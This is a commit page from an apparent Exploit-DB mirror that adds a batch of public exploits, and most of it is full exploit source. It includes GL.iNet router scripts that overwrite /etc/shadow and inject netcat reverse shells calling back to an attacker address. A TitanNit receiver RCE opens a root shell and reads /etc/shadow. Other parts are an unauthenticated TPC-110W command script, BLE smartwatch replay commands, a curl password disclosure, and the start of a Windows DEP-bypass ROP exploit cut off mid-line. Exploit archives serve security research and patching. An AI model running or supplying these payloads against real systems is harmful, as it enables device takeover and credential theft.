bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2024-03-04

Browse source 
22 changes to exploits/shellcodes/ghdb

GL.iNet AR300M v3.216 Remote Code Execution - CVE-2023-46456 Exploit
GL.iNet AR300M v4.3.7 Arbitrary File Read - CVE-2023-46455 Exploit
GL.iNet AR300M v4.3.7 Remote Code Execution - CVE-2023-46454 Exploit

Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated)

R Radio Network FM Transmitter 1.07 system.cgi - Password Disclosure

TitanNit Web Control 2.01 / Atemio 7600 - Root Remote Code Execution

TPC-110W - Missing Authentication for Critical Function

A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc

Easywall 0.3.1 - Authenticated Remote Command Execution

Magento ver. 2.4.6 - XSLT Server Side Injection

AC Repair and Services System v1.0 - Multiple SQL Injection

Enrollment System v1.0 - SQL Injection
Petrol Pump Management Software v.1.0 - SQL Injection
Petrol Pump Management Software v.1.0 - Stored Cross Site Scripting via SVG file
Petrol Pump Management Software v1.0 - 'Address' Stored Cross Site Scripting
Petrol Pump Management Software v1.0 - Remote Code Execution via File Upload

Real Estate Management System v1.0 - Remote Code Execution via File Upload
Simple Student Attendance System v1.0 -  'classid' Time Based Blind & Union Based SQL Injection
Simple Student Attendance System v1.0 - Time Based Blind SQL Injection

Boss Mini 1.4.0 - local file inclusion

Windows PowerShell - Event Log Bypass Single Quote Code Execution
This commit is contained in:
Exploit-DB 2024-03-04 00:16:34 +00:00
parent d0ee8ba723
commit 7ef8e488d8
22 changed files with 1772 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

44
exploits/hardware/remote/51846.c Normal file
View file

@ -0,0 +1,44 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
int sock;
struct sockaddr_in serv_addr;
char command[512];
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0) {
perror("socket");
exit(1);
}
memset(&serv_addr, '0', sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(8888); // The default port of TPC-110W is 8888
if (inet_pton(AF_INET, "192.168.1.10", &serv_addr.sin_addr) <= 0) { // Assuming the device's IP address is 192.168.1.10
perror("inet_pton");
exit(1);
}
if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
perror("connect");
exit(1);
}
// Run command with root privileges
snprintf(command, sizeof(command), "id\n"); // Check user id
write(sock, command, strlen(command));
memset(command, '0', sizeof(command));
read(sock, command, sizeof(command));
printf("%s\n", command);
close(sock);
return 0;
}
//gcc -o tpc-110w-exploit tpc-110w-exp

34
exploits/hardware/remote/51850.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated)
# Date: 13-Nov-2023
# Exploit Author: Alok kumar (alokkumar0200@gmail.com), Cyberpwn Technologies Pvt. Ltd.
# Vendor Homepage: https://www.maximawatches.com
# Product Link: https://www.maximawatches.com/products/max-pro-power
# Firmware Version: v1.0 486A
# Tested on: Maxima Max Pro Power
# CVE : CVE-2023-46916
# It was observed that an attacker can send crafted HEX values to “0x0012” GATT Charactristic handle on the watch to perform unauthorized actions like change Time display format, update Time, update notifications.
# And since, there is no integrity check for data received by the watch, an attacker can sniff the same value on smartwatch A, which later can be sent to smartwatch B leading unauthorized actions
# Scan for bluetooth LE devices nearby using any capable scanner, bluetoothctl is used in this “sudo bluetoothctl scan le”
# “sudo gattool -I” Starts gattool in interactive mode.
# “connect <MAC_OF_DEVICE_FROM_STEP_1>” Connects to the specified BLE device.
# “char-desc” Lists all handles for the device.
# Run “mtu 247” in Gatttool after connection to set MTU for active connection.
# Run “char-read-hnd 0x0054” in Gatttool. Trust And Authorize the device on attacker's machine when prompted.
# "char-write-req 0x0012 ab00000e5422002202002b0009000000059fffffffff" disables Raise to wake feature.
# "char-write-req 0x0012 ab00000ec42f002302002b0009010000059fffffffff" enables Raise to wake feature.
# "char-write-req 0x0012 ab000009c2ee0034050023000400030501" starts Heart Rate monitor
# "char-write-req 0x0012 ab000007c323001902001800020002" sets Time Format to 24 Hrs on smartwatch.
# "char-write-req 0x0012 ab0000070022001802001800020006" sets Time Format to 12 Hrs on smartwatch.

61
exploits/hardware/remote/51851.py Executable file
View file

@ -0,0 +1,61 @@
#!/usr/bin/env python3
# Exploit Title: GL.iNet <= 4.3.7 Arbitrary File Write
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: XX/11/2023
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://www.gli-net.com
# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
# Version: 4.3.7
# Tested on: GL.iNet AR300M
# CVE: CVE-2023-46455
import crypt
import requests
from sys import argv
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
def craft_shadow_file(salted_password):
shadow_content = 'root:{}:19459:0:99999:7:::\n'.format(salted_password)
shadow_content += 'daemon:*:0:0:99999:7:::\n'
shadow_content += 'ftp:*:0:0:99999:7:::\n'
shadow_content += 'network:*:0:0:99999:7:::\n'
shadow_content += 'nobody:*:0:0:99999:7:::\n'
shadow_content += 'dnsmasq:x:0:0:99999:7:::\n'
shadow_content += 'stubby:x:0:0:99999:7:::\n'
shadow_content += 'ntp:x:0:0:99999:7::\n'
shadow_content += 'mosquitto:x:0:0:99999:7::\n'
shadow_content += 'logd:x:0:0:99999:7::\n'
shadow_content += 'ubus:x:0:0:99999:7::\n'
return shadow_content
def replace_shadow_file(url, auth_token, shadow_content):
data = {
'sid': (None, auth_token),
'size': (None, '4'),
'path': (None, '/tmp/ovpn_upload/../../etc/shadow'),
'file': ('shadow', shadow_content)
}
requests.post(url, files=data, verify=False)
def main(base_url, auth_token):
print('[+] Started GL.iNet <= 4.3.7 Arbitrary File Write exploit')
password = input('[?] New password for root user: ')
salted_password = crypt.crypt(password, salt=crypt.METHOD_MD5)
shadow_content = craft_shadow_file(salted_password)
print('[+] Crafted shadow file:\n{}'.format(shadow_content))
print('[*] Replacing shadow file with the crafted one')
replace_shadow_file(base_url+'/upload', auth_token, shadow_content)
print('[+] Done')
if __name__ == '__main__':
if len(argv) < 3:
print('Usage: {} <TARGET_URL> <AUTH_TOKEN>'.format(argv[0]))
exit(1)
main(argv[1], argv[2])

105
exploits/hardware/remote/51852.py Executable file
View file

@ -0,0 +1,105 @@
#!/usr/bin/env python3
# Exploit Title: GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: XX/11/2023
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://www.gli-net.com
# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
# Version: 4.3.7
# Tested on: GL.iNet AR300M
# CVE: CVE-2023-46454
import socket
import requests
import readline
from time import sleep
from random import randint
from sys import stdout, argv
from threading import Thread
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
def trigger_revshell(url, auth_token, payload):
sleep(0.25)
data = {
'jsonrpc': '2.0',
'id': randint(1000, 9999),
'method': 'call',
'params': [
auth_token,
'plugins',
'get_package_info',
{'name': 'bas{}e-files'.format(payload)}
]
}
requests.post(url, json=data, verify=False)
def get_command_response(s):
res = ''
while True:
try:
resp = s.recv(1).decode('utf-8')
res += resp
except UnicodeDecodeError:
pass
except socket.timeout:
break
return res
def revshell_listen(revshell_ip, revshell_port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
try:
s.bind((revshell_ip, int(revshell_port)))
s.listen(1)
except Exception as e:
print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))
exit(1)
try:
clsock, claddr = s.accept()
clsock.settimeout(2)
if clsock:
print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))
res = ''
while True:
command = input('$ ')
clsock.sendall('{}\n'.format(command).encode('utf-8'))
stdout.write(get_command_response(clsock))
except socket.timeout:
print('[-] No connection received in 5 seconds, probably server is not vulnerable...')
s.close()
except KeyboardInterrupt:
print('\n[*] Closing connection')
try:
clsock.close()
except socket.error:
pass
except NameError:
pass
s.close()
def main(base_url, auth_token, revshell_ip, revshell_port):
print('[+] Started GL.iNet <= 4.3.7 RCE exploit')
payload = '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {} {} >/tmp/f)'.format(revshell_ip, revshell_port)
print('[+] Reverse shell payload: "{}"'.format(payload))
print('[*] Triggering reverse shell connection')
Thread(target=trigger_revshell, args=(base_url+'/rpc', auth_token, payload)).start()
print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))
revshell_listen(revshell_ip, revshell_port)
print('[+] Done')
if __name__ == '__main__':
if len(argv) < 5:
print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))
exit(1)
main(argv[1], argv[2], argv[3], argv[4])

205
exploits/hardware/remote/51853.py Executable file
View file

@ -0,0 +1,205 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution
#
#
# Vendor: AAF Digital HD Forum | Atelmo GmbH
# Product web page: http://www.aaf-digital.info | https://www.atemio.de
# Affected version: Firmware <=2.01
#
# Summary: The Atemio AM 520 HD Full HD satellite receiver enables the
# reception of digital satellite programs in overwhelming image quality
# in both SD and HD ranges. In addition to numerous connections, the small
# all-rounder offers a variety of plugins that can be easily installed
# thanks to the large flash memory. The TitanNit Linux software used combines
# the advantages of the existing E2 and Neutrino systems and is therefore
# fast, stable and adaptable.
#
# Desc: The vulnerability in the device enables an unauthorized attacker
# to execute system commands with elevated privileges. This exploit is
# facilitated through the use of the 'getcommand' query within the application,
# allowing the attacker to gain root access.
#
# ========================================================================
# _# python titannnit_rce.py 192.168.1.13:20000 192.168.1.8 9999
# [*] Starting callback listener child thread
# [*] Listening on port 9999
# [*] Generating callback payload
# [*] Calling
# [*] Callback waiting: 3s
# [*] ('192.168.1.13', 40943) called back
# [*] Rootshell session opened
# sh: cannot set terminal process group (1134): Inappropriate ioctl for device
# sh: no job control in this shell
# sh-5.1# id
# <-sh-5.1# id
# uid=0(root) gid=0(root)
# sh-5.1# cat /etc/shadow | grep root
# <-sh-5.1# cat /etc/shadow | grep root
# root:$6$TAdBGj2mY***:18729:0:99999:7:::
# sh-5.1# exit
# [*] OK, bye!
#
# _#
# =======================================================================
#
# Tested on: GNU/Linux 2.6.32.71 (STMicroelectronics)
# GNU/Linux 3.14-1.17 (armv7l)
# GNU/Linux 3.14.2 (mips)
# ATEMIO M46506 revision 990
# Atemio 7600 HD STB
# CPU STx7105 Mboard
# titan web server
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5801
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php
#
#
# 16.11.2023
#
from time import sleep
import threading
import requests
import socket
import sys
class RemoteControl:
def __init__(self):
self.timeout = 10
self.target = None
self.callback = None
self.cstop = threading.Event()
self.path = "/query?getcommand=&cmd="
self.lport = None
self.cmd = None
def beacon(self):
self.cmd = "mkfifo /tmp/j;cat /tmp/j|sh -i 2>&1|nc "
self.cmd += self.callback + " "
self.cmd += str(self.lport) + " "
self.cmd += ">/tmp/j"
self.path += self.cmd
r = requests.get(self.target + self.path)
def slusaj(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", self.lport))
s.listen(1)
print("[*] Listening on port " + str(self.lport))
sleep(1)
try:
conn, addr = s.accept()
print("\n[*]", addr, "called back")
print("[*] Rootshell session opened")
self.cstop.set()
except socket.timeout:
print("[-] Call return timeout\n[!] Check your ports")
conn.close()
while True:
try:
odg = conn.recv(999999).decode()
sys.stdout.write(odg)
command = input()
command += "\n"
if "exit" in command:
exit(-17)
conn.send(command.encode())
sleep(0.5)
sys.stdout.write("<-" + odg.split("\n")[-1])
except:
print("[*] OK, bye!")
exit(-1)
s.close()
def tajmer(self):
for z in range(self.timeout, 0, -1):
poraka = f"[*] Callback waiting: {z}s"
print(poraka, end='', flush=True)
sys.stdout.flush()
sleep(1)
if self.cstop.is_set():
break
print(' ' * len(poraka), end='\r')
if not self.cstop.is_set():
print("[-] Call return timeout\n[!] Check your ports")
exit(0)
else:
print(end=' ')
def thricer(self):
print("[*] Starting callback listener child thread")
plet1 = threading.Thread(name="ZSL", target=self.slusaj)
plet1.start()
sleep(1)
print("[*] Generating callback payload")
sleep(1)
print("[*] Calling")
plet2 = threading.Thread(name="ZSL", target=self.tajmer)
plet2.start()
self.beacon()
plet1.join()
plet2.join()
def howto(self):
if len(sys.argv) != 4:
self.usage()
else:
self.target = sys.argv[1]
self.callback = sys.argv[2]
self.lport = int(sys.argv[3])
if not self.target.startswith("http"):
self.target = "http://{}".format(self.target)
def dostabesemolk(self):
naslov = """
o===--------------------------------------===o
| |
| TitanNit Web Control Remote Code Execution |
| ZSL-2023-5801 |
| |
o===--------------------------------------===o
||
||
||
||
||
||
||
||
L!
/_)
/ /L
_______________________/ (__)
_______________________ (__)
\_(__)
||
||
||
||
||
||
"""
print(naslov)
def usage(self):
self.dostabesemolk()
print("Usage: ./titan.py <target ip> <listen ip> <listen port>")
print("Example: ./titan.py 192.168.1.13:20000 192.168.1.8 9999")
exit(0)
def main(self):
self.howto()
self.thricer()
if __name__ == '__main__':
RemoteControl().main()

172
exploits/hardware/remote/51854.py Executable file
View file

@ -0,0 +1,172 @@
#!/usr/bin/env python3
# Exploit Title: GL.iNet <= 3.216 Remote Code Execution via OpenVPN Client
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: XX/11/2023
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://www.gli-net.com
# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/v1/openwrt-ar300m-3.216-0321-1679391449.tar
# Version: 3.216
# Tested on: GL.iNet AR300M
# CVE: CVE-2023-46456
import socket
import requests
import readline
from time import sleep
from random import randint
from sys import stdout, argv
from threading import Thread
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
def generate_random_string():
return ''.join([chr(randint(97, 122)) for x in range(6)])
def add_config_file(url, auth_token, payload):
data = {'file': ('{}'.format(payload), 'client\ndev tun\nproto udp\nremote 127.0.0.1 1194\nscript-security 2')}
try:
r = requests.post(url, files=data, headers={'Authorization':auth_token}, verify=False)
r.raise_for_status()
except requests.exceptions.RequestException:
print('[X] Error while adding configuration file')
return False
return True
def verify_config_file(url, auth_token, payload):
try:
r = requests.get(url, headers={'Authorization':auth_token}, verify=False)
r.raise_for_status()
if not r.json()['passed'] and payload not in r.json()['passed']:
return False
except requests.exceptions.RequestException:
print('[X] Error while verifying the upload of configuration file')
return False
return True
def add_client(url, auth_token):
postdata = {'description':'RCE_client_{}'.format(generate_random_string())}
try:
r = requests.post(url, data=postdata, headers={'Authorization':auth_token}, verify=False)
r.raise_for_status()
except requests.exceptions.RequestException:
print('[X] Error while adding OpenVPN client')
return False
return True
def get_client_id(url, auth_token, payload):
try:
r = requests.get(url, headers={'Authorization':auth_token}, verify=False)
r.raise_for_status()
for conn in r.json()['clients']:
if conn['defaultserver'] == payload:
return conn['id']
print('[X] Error: could not find client ID')
return False
except requests.exceptions.RequestException:
print('[X] Error while retrieving added OpenVPN client ID')
return False
def connect_vpn(url, auth_token, client_id):
sleep(0.25)
postdata = {'ovpnclientid':client_id, 'enableovpn':'true', 'force_client':'false'}
r = requests.post(url, data=postdata, headers={'Authorization':auth_token}, verify=False)
def cleanup(url, auth_token, client_id):
try:
r = requests.post(url, data={'clientid':client_id}, headers={'Authorization':auth_token}, verify=False)
r.raise_for_status()
except requests.exceptions.RequestException:
print('[X] Error while cleaning up OpenVPN client')
return False
return True
def get_command_response(s):
res = ''
while True:
try:
resp = s.recv(1).decode('utf-8')
res += resp
except UnicodeDecodeError:
pass
except socket.timeout:
break
return res
def revshell_listen(revshell_ip, revshell_port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
try:
s.bind((revshell_ip, int(revshell_port)))
s.listen(1)
except Exception as e:
print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))
exit(1)
try:
clsock, claddr = s.accept()
clsock.settimeout(2)
if clsock:
print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))
res = ''
while True:
command = input('$ ')
clsock.sendall('{}\n'.format(command).encode('utf-8'))
stdout.write(get_command_response(clsock))
except socket.timeout:
print('[-] No connection received in 5 seconds, probably server is not vulnerable...')
s.close()
except KeyboardInterrupt:
print('\n[*] Closing connection')
try:
clsock.close()
except socket.error:
pass
except NameError:
pass
s.close()
def main(base_url, auth_token, revshell_ip, revshell_port):
print('[+] Started GL.iNet <= 3.216 OpenVPN client config filename RCE exploit')
payload = '$(busybox nc {} {} -e sh).ovpn'.format(revshell_ip, revshell_port)
print('[+] Filename payload: "{}"'.format(payload))
print('[*] Uploading crafted OpenVPN config file')
if not add_config_file(base_url+'/api/ovpn/client/upload', auth_token, payload):
exit(1)
if not verify_config_file(base_url+'/cgi-bin/api/ovpn/client/uploadcheck', auth_token, payload):
exit(1)
print('[+] File uploaded successfully')
print('[*] Adding OpenVPN client')
if not add_client(base_url+'/cgi-bin/api/ovpn/client/addnew', auth_token):
exit(1)
client_id = get_client_id(base_url+'/cgi-bin/api/ovpn/client/list', auth_token, payload)
if not client_id:
exit(1)
print('[+] Client ID: ' + client_id)
print('[*] Triggering connection to created OpenVPN client')
Thread(target=connect_vpn, args=(base_url+'/cgi-bin/api/ovpn/client/set', auth_token, client_id)).start()
print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))
revshell_listen(revshell_ip, revshell_port)
print('[*] Clean-up by removing OpenVPN connection')
if not cleanup(base_url+'/cgi-bin/api/ovpn/client/remove', auth_token, client_id):
exit(1)
print('[+] Done')
if __name__ == '__main__':
if len(argv) < 5:
print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))
exit(1)
main(argv[1], argv[2], argv[3], argv[4])

40
exploits/hardware/remote/51855.txt Normal file
View file

@ -0,0 +1,40 @@
R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure
Vendor: R Radio Network
Product web page: http://www.pktc.ac.th
Affected version: 1.07
Summary: R Radio FM Transmitter that includes FM Exciter and
FM Amplifier parameter setup.
Desc: The transmitter suffers from an improper access control
that allows an unauthenticated actor to directly reference the
system.cgi endpoint and disclose the clear-text password of the
admin user allowing authentication bypass and FM station setup
access.
Tested on: CSBtechDevice
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5802
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5802.php
09.10.2023
--
$ curl -s http://192.168.70.12/system.cgi
<html><head><title>System Settings</title>
...
...
Password for user 'admin'</td><td><input type=password name=pw size=10 maxlength=10 value="testingus"></td>
...
...
$

225
exploits/multiple/local/51849.py Executable file
View file

@ -0,0 +1,225 @@
#!/usr/bin/python
# Exploit Title: A-PDF All to MP3 Converter 2.0.0 - DEP Bypass with HeapCreate + HeapAlloc + some_memory_copy_function ROP chain
# Date: 16 November 2023
# Exploit Author: George Washington
# Vendor Homepage: http://www.a-pdf.com/all-to-mp3/download.htm
# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm
# Version: 2.0.0
# Tested on: Windows 7 Ultimate 6.1.7601 SP1 Build 7601 x64
# Based on: https://www.exploit-db.com/exploits/17275
# Remarks: There are some changes to the ROP gadgets obtained from Alltomp3.exe
# Video: https://youtu.be/_JEgdKjbtpI
import socket, struct
file = "1.wav"
size = 8000
############ Parameters for HeapCreate() ############
EXE = b"ZZZZ" # HeapCreate()
EXE += b"AAAA" # RET
EXE += struct.pack("<I", 0x00040000) # Parameter 1 0x00040000
EXE += struct.pack("<I", 0x00000000) # Parameter 2 0x00000000
EXE += struct.pack("<I", 0x00000000) # Parameter 3 0x00000000
EXE += b"YYYY" # HeapAlloc()
EXE += b"BBBB" # RET
EXE += b"CCCC" # Parameter 1 hHandle
EXE += struct.pack("<I", 0x00000008) # Parameter 2 0x00000008
EXE += struct.pack("<I", 0x00000500) # Parameter 3 0x00000500
EXE += struct.pack("<I", 0x1002dd98) # _memcpy_s()
EXE += b"DDDD" # heap pointer
EXE += b"EEEE" # heap pointer
EXE += struct.pack("<I", 0x00000500) # size
EXE += b"GGGG" # shellcode pointer
EXE += struct.pack("<I", 0x00000500) # size
junk = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em